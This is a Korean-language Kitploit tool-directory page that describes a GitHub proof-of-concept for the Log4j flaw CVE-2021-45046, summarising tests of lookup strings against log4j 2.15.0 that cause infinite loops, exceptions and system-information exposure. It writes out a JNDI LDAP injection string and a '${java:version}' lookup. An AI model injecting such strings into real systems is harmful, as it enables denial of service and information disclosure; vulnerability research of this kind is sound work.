Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2021-45046 — Proof-of-concept demonstrating CVE-2021-45046 (Log4j DoS) with test cases for infinite loops, illegal argument exceptions, and system info exposure via JNDI lookups. | Kitploit
도구/GitHubGitHub/ludy-dev/cve-2021-45046
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubludy-dev/cve-2021-45046

cve-2021-45046

Proof-of-concept demonstrating CVE-2021-45046 (Log4j DoS) with test cases for infinite loops, illegal argument exceptions, and system info exposure via JNDI lookups.

저장소 보기
14년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

log4j RCE (CVE-2021-44228)이 2.15에서 패치되었지만, CVE-2021-45046 (DoS 유발) 취약점이 새로 발견되었음. 아래는 테스트 해본 결과.

[테스트 환경] log4j-2.15.0 (api , core) JRE-1.8.0 jdk1.8.0_151 Eclipse IDE (Maven Project)

  1. Log4j RCE (CVE-2021-44228) 구문 테스트 -> Not Vuln

image

  1. 임의의 ctx 객체명을 삽입 -> Not vuln

image

  1. context를 받는 객체와 동일한 이름으로 삽입하는 경우 -> infinite loop 로 DoS 발생

image

  1. ${jndi:ldap://127.0.0.1#[ldap 서버 주소]} 형태로 삽입 -> UnknownHostException 발생, DoS 미발생

image

  1. jndi:ldap://[ldap서버]#[ldap서버] 형태 -> Not vuln

image

  1. Java 코드 삽입 -> illegalArgmumentException 으로 DoS 발생

image

7-1. Java 구문 삽입 -> System info exposure

image

7-2. Java 구문 삽입 ->illegalArgmumentException , DoS 발생

image

-> illegalArgumentException 발생 지점 확인 시 Switch case 문으로 2-5에서 System info exposure 가능한 Java 구문 (${java:version} 은 의도된 루틴으로 보임.

image

도구 다운로드